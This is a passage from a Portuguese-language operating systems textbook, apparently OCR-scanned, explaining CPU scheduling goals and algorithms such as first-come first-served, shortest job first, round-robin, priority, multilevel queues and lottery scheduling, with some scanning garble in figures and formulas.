informação necessária para levar essa dependência em 
consideração. 

Quarto, quando ocorre uma interrupção de E/S, uma 
decisão de escalonamento pode ser feita. Se a interrup- 
ção veio de um dispositivo de E/S que agora completou 
seu trabalho, algum processo que foi bloqueado espe- 
rando pela E/S pode agora estar pronto para executar. 
Cabe ao escalonador decidir se deve executar o proces- 
so que ficou pronto há pouco, o processo que estava 
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sendo executado no momento da interrupção, ou algum 
terceiro processo. 

Se um hardware de relógio fornece interrupções 
periódicas a 50 ou 60 Hz ou alguma outra frequência, 
uma decisão de escalonamento pode ser feita a cada 
interrupção ou a cada k-ésima interrupção de relógio. 
Algoritmos de escalonamento podem ser divididos em 
duas categorias em relação a como lidar com interrup- 
ções de relógio. Um algoritmo de escalonamento não 
preemptivo escolhe um processo para ser executado e 
então o deixa ser executado até que ele seja bloquea- 
do (seja em E/S ou esperando por outro processo), ou 
libera voluntariamente a CPU. Mesmo que ele execute 
por muitas horas, não será suspenso forçosamente. Na 
realidade, nenhuma decisão de escalonamento é feita 
durante interrupções de relógio. Após o processamento 
da interrupção de relógio ter sido concluído, o processo 
que estava executando antes da interrupção é retomado, 
a não ser que um processo mais prioritário esteja espe- 
rando por um tempo de espera agora satisfeito. 

Por outro lado, um algoritmo de escalonamento pre- 
emptivo escolhe um processo e o deixa executar por 
no máximo um certo tempo fixado. Se ele ainda estiver 
executando ao fim do intervalo de tempo, ele é suspenso 
e o escalonador escolhe outro processo para executar 
(se algum estiver disponível). Realizar o escalonamen- 
to preemptivo exige que uma interrupção de relógio 
ocorra ao fim do intervalo para devolver o controle da 
CPU de volta para o escalonador. Se nenhum relógio 
estiver disponível, o escalonamento não preemptivo é 
a única solução. 


Categorias de algoritmos de escalonamento 


De maneira pouco surpreendente, em diferentes am- 
bientes, distintos algoritmos de escalonamento são ne- 
cessários. Essa situação surge porque diferentes áreas 
de aplicação (e de tipos de sistemas operacionais) têm 
metas diversas. Em outras palavras, o que deve ser oti- 
mizado pelo escalonador não é o mesmo em todos os 
sistemas. Três ambientes valem ser destacados aqui: 


1. Lote. 
2. Interativo. 
3. Tempo real. 


Sistemas em lote ainda são amplamente usados no 
mundo de negócios para folhas de pagamento, esto- 
ques, contas a receber, contas a pagar, cálculos de juros 
(em bancos), processamento de pedidos de indenização 
(em companhias de seguro) e outras tarefas periódi- 
cas. Em sistemas em lote, não há usuários esperando 


impacientemente em seus terminais para uma resposta 
rápida a uma solicitação menor. Em consequência, al- 
goritmos não preemptivos, ou algoritmos preemptivos 
com longos períodos para cada processo são muitas ve- 
zes aceitáveis. Essa abordagem reduz os chaveamentos 
de processos e melhora o desempenho. Na realidade, os 
algoritmos em lote são bastante comuns e muitas vezes 
aplicáveis a outras situações também, o que torna seu 
estudo interessante, mesmo para pessoas não envolvi- 
das na computação corporativa de grande porte. 

Em um ambiente com usuários interativos, a pre- 
empção é essencial para evitar que um processo tome 
conta da CPU e negue serviço para os outros. Mesmo 
que nenhum processo execute de modo intencional para 
sempre, um erro em um programa pode levar um pro- 
cesso a impedir indefinidamente que todos os outros 
executem. A preempção é necessária para evitar esse 
comportamento. Os servidores também caem nessa ca- 
tegoria, visto que eles normalmente servem a múltiplos 
usuários (remotos), todos os quais estão muito apressa- 
dos, assim como usuários de computadores. 

Em sistemas com restrições de tempo real, a pre- 
empção às vezes, por incrível que pareça, não é neces- 
sária, porque os processos sabem que eles não podem 
executar por longos períodos e em geral realizam o seu 
trabalho e bloqueiam rapidamente. A diferença com os 
sistemas interativos é que os de tempo real executam 
apenas programas que visam ao progresso da aplicação 
à mão. Sistemas interativos são sistemas para fins gerais 
e podem executar programas arbitrários que não são co- 
operativos e talvez até mesmo maliciosos. 


Objetivos do algoritmo de escalonamento 


A fim de projetar um algoritmo de escalonamento, é 
necessário ter alguma ideia do que um bom algoritmo 
deve fazer. Certas metas dependem do ambiente (em 
lote, interativo ou de tempo real), mas algumas são de- 
sejáveis em todos os casos. Algumas metas estão lista- 
das na Figura 2.40. Discutiremos essas metas a seguir. 

Em qualquer circunstância, a justiça é importante. 
Processos comparáveis devem receber serviços compa- 
ráveis. Conceder a um processo muito mais tempo de 
CPU do que para um processo equivalente não é justo. 
É claro que categorias diferentes de processos podem 
ser tratadas diferentemente. Pense sobre controle de 
segurança e elaboração da folha de pagamento em um 
centro de computadores de um reator nuclear. 

De certa maneira relacionado com justiça está o cum- 
primento das políticas do sistema. Se a política local é 
que os processos de controle de segurança são executados 


(eU) Algumas metas do algoritmo de escalonamento 
sob diferentes circunstâncias. 
Todos os sistemas 


Justiça — dar a cada processo uma porção justa 
da CPU 

Aplicação da política — verificar se a política 
estabelecida é cumprida 


Equilíbrio — manter ocupadas todas as partes 
do sistema 


Sistemas em lote 


Vazão (throughput) — maximizar o número de tarefas 
por hora 


Tempo de retorno — minimizar o tempo entre a 
submissão e o término 


Utilização de CPU — manter a CPU ocupada o 
tempo todo 
Sistemas interativos 
Tempo de resposta — responder rapidamente às 
requisições 
Proporcionalidade — satisfazer às expectativas 
dos usuários 
Sistemas de tempo real 
Cumprimento dos prazos — evitar a perda de dados 


Previsibilidade — evitar a degradação da qualidade 
em sistemas multimídia 


sempre que quiserem, mesmo que isso signifique atraso 
de 30 segundos da folha de pagamento, o escalonador pre- 
cisa certificar-se de que essa política seja cumprida. 
Outra meta geral é manter todas as partes do sistema 
ocupadas quando possível. Se a CPU e todos os outros 
dispositivos de E/S podem ser mantidos executando o 
tempo inteiro, mais trabalho é realizado por segundo 
do que se alguns dos componentes estivessem ociosos. 
No sistema em lote, por exemplo, o escalonador tem 
controle sobre quais tarefas são trazidas à memória para 
serem executadas. Ter alguns processos limitados pela 
CPU e alguns limitados pela E/S juntos na memória é 
uma ideia melhor do que primeiro carregar e executar 
todas as tarefas limitadas pela CPU e, quando forem 
concluídas, carregar e executar todas as tarefas limita- 
das pela E/S. Se a segunda estratégia for usada, quando 
os processos limitados pela CPU estiverem sendo exe- 
cutados, eles disputarão a CPU e o disco ficará ocioso. 
Depois, quando as tarefas limitadas pela E/S entrarem, 
elas disputarão o disco e a CPU ficará ociosa. Assim, é 
melhor manter o sistema inteiro executando ao mesmo 
tempo mediante uma mistura cuidadosa de processos. 
Os gerentes de grandes centros de computadores que 
executam muitas tarefas em lote costumam observar 
três métricas para ver como seus sistemas estão desem- 
penhando: vazão, tempo de retorno e utilização da CPU. 
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A vazão é o número de tarefas por hora que o sistema 
completa. Considerados todos os fatores, terminar 50 
tarefas por hora é melhor do que terminar 40 tarefas por 
hora. O tempo de retorno é estatisticamente o tempo 
médio do momento em que a tarefa em lote é submetida 
até o momento em que ela é concluída. Ele mede quanto 
tempo o usuário médio tem de esperar pela saída. Aqui 
a regra é: menos é mais. 

Um algoritmo de escalonamento que tenta maximizar 
a vazão talvez não minimize necessariamente o tempo de 
retorno. Por exemplo, dada uma combinação de tarefas 
curtas e tarefas longas, um escalonador que sempre exe- 
cutou tarefas curtas e nunca as longas talvez consiga uma 
excelente vazão (muitas tarefas curtas por hora), mas 
à custa de um tempo de retorno terrível para as tarefas 
longas. Se as tarefas curtas seguissem chegando a uma 
taxa aproximadamente uniforme, as tarefas longas talvez 
nunca fossem executadas, tornando o tempo de retorno 
médio infinito, conquanto alcançando uma alta vazão. 

A utilização da CPU é muitas vezes usada como uma 
métrica nos sistemas em lote. No entanto, ela não é uma 
boa métrica. O que de fato importa é quantas tarefas por 
hora saem do sistema (vazão) e quanto tempo leva para 
receber uma tarefa de volta (tempo de retorno). Usar a 
utilização de CPU como uma métrica é como classificar 
carros com base em seu giro de motor. Entretanto, saber 
quando a utilização da CPU está próxima de 100% é 
útil para saber quando chegou o momento de obter mais 
poder computacional. 

Para sistemas interativos, aplicam-se metas diferen- 
tes. A mais importante é minimizar o tempo de respos- 
ta, isto é, o tempo entre emitir um comando e receber 
o resultado. Em um computador pessoal, em que um 
processo de segundo plano está sendo executado (por 
exemplo, lendo e armazenando e-mail da rede), uma so- 
licitação de usuário para começar um programa ou abrir 
um arquivo deve ter precedência sobre o trabalho de 
segundo plano. Atender primeiro todas as solicitações 
interativas será percebido como um bom serviço. 

Uma questão de certa maneira relacionada é o que 
poderia ser chamada de proporcionalidade. Usuários 
têm uma ideia inerente (porém muitas vezes incorreta) 
de quanto tempo as coisas devem levar. Quando uma 
solicitação que o usuário percebe como complexa leva 
muito tempo, os usuários aceitam isso, mas quando uma 
solicitação percebida como simples leva muito tempo, 
eles ficam irritados. Por exemplo, se clicar em um ícone 
que envia um vídeo de 500 MB para um servidor na 
nuvem demorar 60 segundos, o usuário provavelmente 
aceitará isso como um fato da vida por não esperar que 
a transferência leve 5 s. Ele sabe que levará um tempo. 
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Por outro lado, quando um usuário clica em um íco- 
ne que desconecta a conexão com o servidor na nuvem 
após o vídeo ter sido enviado, ele tem expectativas dife- 
rentes. Se a desconexão não estiver completa após 30 s, 
o usuário provavelmente estará soltando algum palavrão 
e após 60 s ele estará espumando de raiva. Esse compor- 
tamento decorre da percepção comum dos usuários de 
que enviar um monte de dados supostamente leva muito 
mais tempo que apenas desconectar uma conexão. Em 
alguns casos (como esse), o escalonador não pode fazer 
nada a respeito do tempo de resposta, mas em outros ca- 
sos ele pode, especialmente quando o atraso é causado 
por uma escolha ruim da ordem dos processos. 

Sistemas de tempo real têm propriedades diferentes 
de sistemas interativos e, desse modo, metas de esca- 
lonamento diferentes. Eles são caracterizados por ter 
prazos que devem — ou pelo menos deveriam —, ser 
cumpridos. Por exemplo, se um computador está con- 
trolando um dispositivo que produz dados a uma taxa 
regular, deixar de executar o processo de coleta de da- 
dos em tempo pode resultar em dados perdidos. Assim, 
a principal exigência de um sistema de tempo real é 
cumprir com todos (ou a maioria) dos prazos. 

Em alguns sistemas de tempo real, especialmente aque- 
les envolvendo multimídia, a previsibilidade é importan- 
te. Descumprir um prazo ocasional não é fatal, mas se o 
processo de áudio executar de maneira errática demais, a 
qualidade do som deteriorará rapidamente. O vídeo tam- 
bém é uma questão, mas o ouvido é muito mais sensível a 
atrasos que o olho. Para evitar esse problema, o escalona- 
mento de processos deve ser altamente previsível e regular. 
Neste capítulo, estudaremos algoritmos de escalonamento 
interativo e em lote. O escalonamento de tempo real não 
é abordado no livro, mas no material extra sobre sistemas 
operacionais de multimídia na Sala Virtual do livro. 


2.4.2 Escalonamento em sistemas em lote 


Chegou o momento agora de passar das questões de 
escalonamento gerais para algoritmos de escalonamento 
específicos. Nesta seção, examinaremos os algoritmos 
usados em sistemas em lote. Nas seções seguintes, exa- 
minaremos sistemas interativos e de tempo real. Vale a 
pena destacar que alguns algoritmos são usados tanto 
nos sistemas interativos como nos em lote. Estudaremos 
esses mais tarde. 


Primeiro a chegar, primeiro a ser servido 


É provável que o mais simples de todos os algorit- 
mos de escalonamento já projetados seja o primeiro 


a chegar, primeiro a ser servido (first-come, first- 
-served) não preemptivo. Com esse algoritmo, a CPU é 
atribuída aos processos na ordem em que a requisitam. 
Basicamente, há uma fila única de processos prontos. 
Quando a primeira tarefa entrar no sistema de manhã, 
ela é iniciada imediatamente e deixada executar por 
quanto tempo ela quiser. Ela não é interrompida por ter 
sido executada por tempo demais. À medida que as ou- 
tras tarefas chegam, elas são colocadas no fim da fila. 
Quando o processo que está sendo executado é bloquea- 
do, o primeiro processo na fila é executado em seguida. 
Quando um processo bloqueado fica pronto — assim 
como uma tarefa que chegou há pouco —, ele é coloca- 
do no fim da fila, atrás dos processos em espera. 

A grande força desse algoritmo é que ele é fácil de 
compreender e igualmente fácil de programar. Ele tam- 
bém é tão justo quanto alocar ingressos escassos de um 
concerto ou iPhones novos para pessoas que estão dis- 
postas a esperar na fila desde às duas da manhã. Com 
esse algoritmo, uma única lista encadeada controla to- 
dos os processos. Escolher um processo para executar 
exige apenas remover um da frente da fila. Acrescentar 
uma nova tarefa ou desbloquear um processo exige ape- 
nas colocá-lo no fim da fila. O que poderia ser mais 
simples de compreender e implementar? 

Infelizmente, o primeiro a chegar, primeiro a ser servi- 
do também tem uma desvantagem poderosa. Suponha que 
há um processo limitado pela computação que é executa- 
do por 1 s de cada vez e muitos processos limitados pela 
E/S que usam pouco tempo da CPU, mas cada um tem de 
realizar 1.000 leituras do disco para ser concluído. O pro- 
cesso limitado pela computação é executado por 1 s, então 
ele lê um bloco de disco. Todos os processos de E/S são 
executados agora e começam leituras de disco. Quando o 
processo limitado pela computação obtém seu bloco de 
disco, ele é executado por mais 1 s, seguido por todos os 
processos limitados pela E/S em rápida sucessão. 

O resultado líquido é que cada processo limitado 
pela E/S lê 1 bloco por segundo e levará 1.000 s para 
terminar. Com o algoritmo de escalonamento que cau- 
sasse a preempção do processo limitado pela compu- 
tação a cada 10 ms, os processos limitados pela E/S 
terminariam em 10 s em vez de 1.000 s, e sem retardar 
muito o processo limitado pela computação. 


Tarefa mais curta primeiro 


Agora vamos examinar outro algoritmo em lote não 
preemptivo que presume que os tempos de execução 
são conhecidos antecipadamente. Em uma companhia 
de seguros, por exemplo, as pessoas podem prever com 


bastante precisão quanto tempo levará para executar um 
lote de 1.000 solicitações, tendo em vista que um traba- 
lho similar é realizado todos os dias. Quando há vários 
trabalhos igualmente importantes esperando na fila de 
entrada para serem iniciados, o escalonador escolhe a 
tarefa mais curta primeiro (shortest job first). Ob- 
serve a Figura 2.41. Nela vemos quatro tarefas 4, B, 
Ce D com tempos de execução de 8, 4, 4 e 4 minutos, 
respectivamente. Ao executá-las nessa ordem, o tempo 
de retorno para 4 é 8 minutos, para B é 12 minutos, para 
C é 16 minutos e para D é 20 minutos, resultando em 
uma média de 14 minutos. 

Agora vamos considerar executar essas quatro ta- 
refas usando o algoritmo tarefa mais curta primeiro, 
como mostrado na Figura 2.41(b). Os tempos de retor- 
no são agora 4, 8, 12 e 20 minutos, resultando em uma 
média de 11 minutos. A tarefa mais curta primeiro é 
provavelmente uma ótima escolha. Considere o caso de 
quatro tarefas, com tempos de execução de a, b, ced, 
respectivamente. A primeira tarefa termina no tempo a, 
a segunda no tempo a + b, e assim por diante. O tempo 
de retorno médio é (4a + 3b + 2c + d)/4. Fica claro que 
a contribui mais para a média do que os outros tempos, 
logo deve ser a tarefa mais curta, com b em seguida, 
então c e finalmente d como o mais longo, visto que ele 
afeta apenas seu próprio tempo de retorno. O mesmo ar- 
gumento aplica-se igualmente bem a qualquer número 
de tarefas. 

Vale a pena destacar que a tarefa mais curta primei- 
ro é ótima apenas quando todas as tarefas estão dis- 
poníveis simultaneamente. Como um contraexemplo, 
considere cinco tarefas, Æ a E, com tempos de execu- 
ção de 2,4, 1, 1 e 1, respectivamente. Seus tempos de 


Um exemplo do escalonamento tarefa mais curta 
primeiro. (a) Executando quatro tarefas na ordem 
original. (b) Executando-as na ordem tarefa mais 
curta primeiro. 


8 4 4 4 
a fefefe] 
(a) 

4 4 4 8 
efef a| 


(b) 
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chegada são 0, 0, 3, 3 e 3. No início, apenas A ou B po- 
dem ser escolhidos, dado que as outras três tarefas não 
chegaram ainda. Usando a tarefa mais curta primeiro, 
executaremos as tarefas na ordem 4, B, C, D, E para um 
tempo de espera médio de 4,6. No entanto, executá-las 
na ordem B, C, D, E, A tem um tempo de espera médio 
de 4,4. 


Tempo restante mais curto em seguida 


Uma versão preemptiva da tarefa mais curta pri- 
meiro é o tempo restante mais curto em seguida 
(shortest remaining time next). Com esse algoritmo, o 
escalonador escolhe o processo cujo tempo de execução 
restante é o mais curto. De novo, o tempo de execução 
precisa ser conhecido antecipadamente. Quando uma 
nova tarefa chega, seu tempo total é comparado com o 
tempo restante do processo atual. Se a nova tarefa pre- 
cisa de menos tempo para terminar do que o processo 
atual, este é suspenso e a nova tarefa iniciada. Esse es- 
quema permite que tarefas curtas novas tenham um bom 
desempenho. 


2.4.3 Escalonamento em sistemas interativos 


Examinaremos agora alguns algoritmos que podem 
ser usados em sistemas interativos. Eles são comuns em 
computadores pessoais, servidores e outros tipos de sis- 
temas também. 


Escalonamento por chaveamento circular 


Um dos algoritmos mais antigos, simples, justos e 
amplamente usados é o circular (round-robin). A cada 
processo é designado um intervalo, chamado de seu 
quantum, durante o qual ele é deixado executar. Se o 
processo ainda está executando ao fim do quantum, a 
CPU sofrerá uma preempção e receberá outro proces- 
so. Se o processo foi bloqueado ou terminado antes de 
o quantum ter decorrido, o chaveamento de CPU será 
feito quando o processo bloquear, é claro. O escalona- 
mento circular é fácil de implementar. Tudo o que o es- 
calonador precisa fazer é manter uma lista de processos 
executáveis, como mostrado na Figura 2.42(a). Quando 
o processo usa todo o seu quantum, ele é colocado no 
fim da lista, como mostrado na Figura 2.42(b). 

A única questão realmente interessante em relação 
ao escalonamento circular é o comprimento do quan- 
tum. Chavear de um processo para o outro exige certo 


Jelli: TEP] Escalonamento circular. (a) A lista de processos 
executáveis. (b) A lista de processos executáveis 
após B usar todo seu quantum. 
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Processo atual 


Próximo processo 





montante de tempo para fazer toda a administração — 
salvando e carregando registradores e mapas de me- 
mória, atualizando várias tabelas e listas, carregando e 
descarregando memória cache, e assim por diante. Su- 
ponha que esse chaveamento de processo ou chavea- 
mento de contexto, como é chamado às vezes, leva 1 
ms, incluindo o chaveamento dos mapas de memória, 
carregar e descarregar o cache etc. Também suponha 
que o quantum é estabelecido em 4 ms. Com esses pa- 
râmetros, após realizar 4 ms de trabalho útil, a CPU terá 
de gastar (isto é, desperdiçar) 1 ms no chaveamento de 
processo. Desse modo, 20% do tempo da CPU será jo- 
gado fora em overhead administrativo. Claramente, isso 
é demais. 

Para melhorar a eficiência da CPU, poderíamos con- 
figurar o quantum para, digamos, 100 ms. Agora o tem- 
po desperdiçado é de apenas 1%. Mas considere o que 
acontece em um sistema de servidores se 50 solicitações 
entram em um intervalo muito curto e com exigências 
de CPU com grande variação. Cinquenta processos se- 
rão colocados na lista de processos executáveis. Se a 
CPU estiver ociosa, o primeiro começará imediatamen- 
te, o segundo não poderá começar até 100 ms mais tarde 
e assim por diante. O último azarado talvez tenha de 
esperar 5 s antes de ter uma chance, presumindo que 
todos os outros usem todo o seu quantum. A maioria 
dos usuários achará demorada uma resposta de 5 s para 
um comando curto. Essa situação seria especialmente 
ruim se algumas das solicitações próximas do fim da 
fila exigissem apenas alguns milissegundos de tempo 
da CPU. Com um quantum curto, eles teriam recebido 
um serviço melhor. 

Outro fator é que se o quantum for configurado por 
um tempo mais longo que o surto de CPU médio, a pre- 
empção não acontecerá com muita frequência. Em vez 
disso, a maioria dos processos desempenhará uma ope- 
ração de bloqueio antes de o quantum acabar, provocan- 
do um chaveamento de processo. Eliminar a preempção 


melhora o desempenho, porque os chaveamentos de pro- 
cesso então acontecem apenas quando são logicamente 
necessários, isto é, quando um processo é bloqueado e 
não pode continuar. 

A seguinte conclusão pode ser formulada: estabe- 
lecer o quantum curto demais provoca muitos chavea- 
mentos de processos e reduz a eficiência da CPU, mas 
estabelecê-lo longo demais pode provocar uma resposta 
ruim a solicitações interativas curtas. Um quantum em 
torno de 20-50 ms é muitas vezes bastante razoável. 


Escalonamento por prioridades 


O escalonamento circular pressupõe implicitamente 
que todos os processos são de igual importância. Muitas 
vezes, as pessoas que são proprietárias e operam compu- 
tadores multiusuário têm ideias bem diferentes sobre o 
assunto. Em uma universidade, por exemplo, uma ordem 
hierárquica começaria pelo reitor, os chefes de departa- 
mento em seguida, então os professores, secretários, ze- 
ladores e, por fim, os estudantes. A necessidade de levar 
em consideração fatores externos leva ao escalonamento 
por prioridades. A ideia básica é direta: a cada proces- 
so é designada uma prioridade, e o processo executável 
com a prioridade mais alta é autorizado a executar. 

Mesmo em um PC com um único proprietário, pode 
haver múltiplos processos, alguns dos quais são mais 
importantes do que os outros. Por exemplo, a um pro- 
cesso daemon enviando mensagens de correio eletrôni- 
co no segundo plano deve ser atribuída uma prioridade 
mais baixa do que a um processo exibindo um filme de 
vídeo na tela em tempo real. 

Para evitar que processos de prioridade mais alta exe- 
cutem indefinidamente, o escalonador talvez diminua a 
prioridade do processo que está sendo executado em cada 
tique do relógio (isto é, em cada interrupção do relógio). 
Se essa ação faz que a prioridade caia abaixo daquela do 
próximo processo com a prioridade mais alta, ocorre um 
chaveamento de processo. Como alternativa, pode ser 
designado a cada processo um quantum de tempo má- 
ximo no qual ele é autorizado a executar. Quando esse 
quantum for esgotado, o processo seguinte na escala de 
prioridade recebe uma chance de ser executado. 

Prioridades podem ser designadas a processos estati- 
camente ou dinamicamente. Em um computador militar, 
processos iniciados por generais podem começar com 
uma prioridade 100, processos iniciados por coronéis a 
90, majores a 80, capitães a 70, tenentes a 60 e assim por 
diante. Como alternativa, em uma central de computação 
comercial, tarefas de alta prioridade podem custar US$ 


100 uma hora, prioridade média US$ 75 e baixa priorida- 
de US$ 50. O sistema UNIX tem um comando, nice, que 
permite que um usuário reduza voluntariamente a prio- 
ridade do seu processo, a fim de ser legal com os outros 
usuários, mas ninguém nunca o utiliza. 

Prioridades também podem ser designadas dinami- 
camente pelo sistema para alcançar determinadas metas. 
Por exemplo, alguns processos são altamente limitados 
pela E/S e passam a maior parte do tempo esperando 
para a E/S ser concluída. Sempre que um processo as- 
sim quer a CPU, ele deve recebê-la imediatamente, para 
deixá-lo iniciar sua próxima solicitação de E/S, que 
pode então proceder em paralelo com outro processo 
que estiver de fato computando. Fazer que o processo 
limitado pela E/S espere muito tempo pela CPU signi- 
ficará apenas tê-lo ocupando a memória por um tempo 
desnecessariamente longo. Um algoritmo simples para 
proporcionar um bom serviço para processos limitados 
pela E/S é configurar a prioridade para 1/f, onde f é a 
fração do último quantum que o processo usou. Um pro- 
cesso que usou apenas 1 ms do seu quantum de 50 ms 
receberia a prioridade 50, enquanto um que usasse 25 
ms antes de bloquear receberia a prioridade 2, e um que 
usasse o quantum inteiro receberia a prioridade 1. 

Muitas vezes é conveniente agrupar processos em 
classes de prioridade e usar o escalonamento de priori- 
dades entre as classes, mas escalonamento circular den- 
tro de cada classe. A Figura 2.43 mostra um sistema com 
quatro classes de prioridade. O algoritmo de escalona- 
mento funciona do seguinte modo: desde que existam 
processos executáveis na classe de prioridade 4, apenas 
execute cada um por um quantum, estilo circular, e ja- 
mais se importe com classes de prioridade mais baixa. 
Se a classe de prioridade 4 estiver vazia, então execute 
os processos de classe 3 de maneira circular. Se ambas 
as classes — 4 e 3 — estiverem vazias, então execute 
a classe 2 de maneira circular e assim por diante. Se as 
prioridades não forem ajustadas ocasionalmente, classes 
de prioridade mais baixa podem todas morrer famintas. 


Ke TEE] Um algoritmo de escalonamento com quatro 
classes de prioridade. 





Cabeçalhos Processos executáveis 
das filas 
Prioridade 4 || (Prioridade mais alta) 








Prioridade 3 


Prioridade 2 


Prioridade 1 


(Prioridade mais baixa) 
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Múltiplas filas 


Um dos primeiros escalonadores de prioridade foi em 
CTSS, o sistema compatível de tempo compartilhado do 
MIT que operava no IBM 7094 (CORBATO etal., 1962). 
O CTSS tinha o problema que o chaveamento de pro- 
cesso era lento, pois o 7094 conseguia armazenar apenas 
um processo na memória. Cada chaveamento significava 
trocar o processo atual para o disco e ler em um novo a 
partir do disco. Os projetistas do CTSS logo perceberam 
que era mais eficiente dar aos processos limitados pela 
CPU um grande quantum de vez em quando, em vez de 
dar a eles pequenos quanta frequentemente (para redu- 
zir as operações de troca). Por outro lado, dar a todos os 
processos um grande quantum significaria um tempo de 
resposta ruim, como já vimos. A solução foi estabelecer 
classes de prioridade. Processos na classe mais alta se- 
riam executados por dois quanta. Processos na classe se- 
guinte seriam executados por quatro quanta etc. Sempre 
que um processo consumia todos os quanta alocados para 
ele, era movido para uma classe inferior. 

Como exemplo, considere um processo que precisas- 
se computar continuamente por 100 quanta. De início 
ele receberia um quantum, então seria trocado. Da vez 
seguinte, ele receberia dois quanta antes de ser trocado. 
Em sucessivas execuções ele receberia 4, 8, 16, 32 e 64 
quanta, embora ele tivesse usado apenas 377 dos 64 quanta 
finais para completar o trabalho. Apenas 7 trocas seriam 
necessárias (incluindo a carga inicial) em vez de 100 
com um algoritmo circular puro. Além disso, à medida 
que o processo se aprofundasse nas filas de prioridade, 
ele seria usado de maneira cada vez menos frequente, 
poupando a CPU para processos interativos curtos. 

A política a seguir foi adotada a fim de evitar punir 
para sempre um processo que precisasse ser executado 
por um longo tempo quando fosse iniciado pela primeira 
vez, mas se tornasse interativo mais tarde. Sempre que 
a tecla Enter era digitada em um terminal, o processo 
pertencente âquele terminal era movido para a classe de 
prioridade mais alta, pressupondo que ele estava prestes 
a tornar-se interativo. Um belo dia, algum usuário com 
um processo pesadamente limitado pela CPU descobriu 
que apenas sentar em um terminal e digitar a tecla En- 
ter ao acaso de tempos em tempos ajudava e muito seu 
tempo de resposta. Moral da história: acertar na prática 
é muito mais difícil que acertar na regra. 


Processo mais curto em seguida 


Como a tarefa mais curta primeiro sempre produz 
o tempo de resposta médio mínimo para sistemas em 
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lote, seria bom se ela pudesse ser usada para processos 
interativos também. Até certo ponto, ela pode ser. Pro- 
cessos interativos geralmente seguem o padrão de es- 
perar pelo comando, executar o comando, esperar pelo 
comando, executar o comando etc. Se considerarmos a 
execução de cada comando uma “tarefa” em separado, 
então podemos minimizar o tempo de resposta geral 
executando a tarefa mais curta primeiro. O problema é 
descobrir qual dos processos atualmente executáveis é 
o mais curto. 

Uma abordagem é fazer estimativas baseadas no 
comportamento passado e executar o processo com o 
tempo de execução estimado mais curto. Suponha que 
o tempo estimado por comando para alguns processos é 
T,. Agora suponha que a execução seguinte é mensura- 
da como sendo 7. Poderíamos atualizar nossa estima- 
tiva tomando a soma ponderada desses dois números, 
isto é, aT, + (1 — a)T,. Pela escolha de a podemos deci- 
dir que o processo de estimativa esqueça as execuções 
anteriores rapidamente, ou as lembre por um longo 
tempo. Com a = 1/2, temos estimativas sucessivas de 


To T/2 + 7/2, T/4 + 7/4 + T,/2, T/8+T/8+ T,/4 
+ 7/2 
3 


Após três novas execuções, o peso de T, na nova es- 
timativa caiu para 1/8. 

A técnica de estimar o valor seguinte em uma série 
tomando a média ponderada do valor mensurado atu- 
al e a estimativa anterior é às vezes chamada de enve- 
lhecimento (aging). Ela é aplicável a muitas situações 
onde uma previsão precisa ser feita baseada nos valores 
anteriores. O envelhecimento é especialmente fácil de 
implementar quando a = 1/2. Tudo o que é preciso fazer 
é adicionar o novo valor à estimativa atual e dividir a 
soma por 2 (deslocando-a 1 bit para a direita). 


Escalonamento garantido 


Uma abordagem completamente diferente para o es- 
calonamento é fazer promessas reais para os usuários a 
respeito do desempenho e então cumpri-las. Uma pro- 
messa realista de se fazer e fácil de cumprir é a seguinte: 
se n usuários estão conectados enquanto você está tra- 
balhando, você receberá em torno de 1/n da potência da 
CPU. De modo similar, em um sistema de usuário único 
com n processos sendo executados, todos os fatores per- 
manecendo os mesmos, cada um deve receber 1/n dos 
ciclos da CPU. Isso parece bastante justo. 

Para cumprir essa promessa, o sistema deve contro- 
lar quanta CPU cada processo teve desde sua criação. 
Ele então calcula o montante de CPU a que cada um 


tem direito, especificamente, o tempo desde a criação 
dividido por n. Tendo em vista que o montante de tem- 
po da CPU que cada processo realmente teve também 
é conhecido, calcular o índice de tempo de CPU real 
consumido com o tempo de CPU ao qual ele tem di- 
reito é algo bastante direto. Um índice de 0,5 significa 
que o processo teve apenas metade do que deveria, e 
um índice de 2,0 significa que teve duas vezes o mon- 
tante de tempo ao qual ele tinha direito. O algoritmo 
então executará o processo com o índice mais baixo 
até que seu índice aumente e se aproxime do de seu 
competidor. Então este é escolhido para executar em 
seguida. 


Escalonamento por loteria 


Embora realizar promessas para os usuários e cum- 
pri-las seja uma bela ideia, ela é difícil de implementar. 
No entanto, outro algoritmo pode ser usado para gerar 
resultados similarmente previsíveis com uma imple- 
mentação muito mais simples. Ele é chamado de esca- 
lonamento por loteria (WALDSPURGER e WEIHL, 
1994). 

A ideia básica é dar bilhetes de loteria aos processos 
para vários recursos do sistema, como o tempo da CPU. 
Sempre que uma decisão de escalonamento tiver de ser 
feita, um bilhete de loteria será escolhido ao acaso, e o 
processo com o bilhete fica com o recurso. Quando apli- 
cado ao escalonamento de CPU, o sistema pode realizar 
um sorteio 50 vezes por segundo, com cada vencedor 
recebendo 20 ms de tempo da CPU como prêmio. 

Parafraseando George Orwell: “Todos os processos 
são iguais, mas alguns processos são mais iguais”. Pro- 
cessos mais importantes podem receber bilhetes extras, 
para aumentar a chance de vencer. Se há 100 bilhetes 
emitidos e um processo tem 20 deles, ele terá uma chan- 
ce de 20% de vencer cada sorteio. A longo prazo, ele 
terá acesso a cerca de 20% da CPU. Em comparação 
com o escalonador de prioridade, em que é muito difícil 
de afirmar o que realmente significa ter uma prioridade 
de 40, aqui a regra é clara: um processo que tenha uma 
fração f dos bilhetes terá aproximadamente uma fração 
f do recurso em questão. 

O escalonamento de loteria tem várias propriedades 
interessantes. Por exemplo, se um novo processo apa- 
rece e ele ganha alguns bilhetes, no sorteio seguinte ele 
teria uma chance de vencer na proporção do número de 
bilhetes que tem em mãos. Em outras palavras, o esca- 
lonamento de loteria é altamente responsivo. 

Processos cooperativos podem trocar bilhetes se 
assim quiserem. Por exemplo, quando um processo 


cliente envia uma mensagem para um processo servi- 
dor e então bloqueia, ele pode dar todos os seus bilhe- 
tes para o servidor a fim de aumentar a chance de que 
o servidor seja executado em seguida. Quando o servi- 
dor tiver concluído, ele devolve os bilhetes de maneira 
que o cliente possa executar novamente. Na realidade, 
na ausência de clientes, os servidores não precisam de 
bilhete algum. 

O escalonamento de loteria pode ser usado para so- 
lucionar problemas difíceis de lidar com outros méto- 
dos. Um exemplo é um servidor de vídeo no qual vários 
processos estão alimentando fluxos de vídeo para seus 
clientes, mas em diferentes taxas de apresentação dos 
quadros. Suponha que os processos precisem de quadros 
a 10, 20 e 25 quadros/s. Ao alocar para esses processos 
10, 20 e 25 bilhetes, nessa ordem, eles automaticamente 
dividirão a CPU em mais ou menos a proporção correta, 
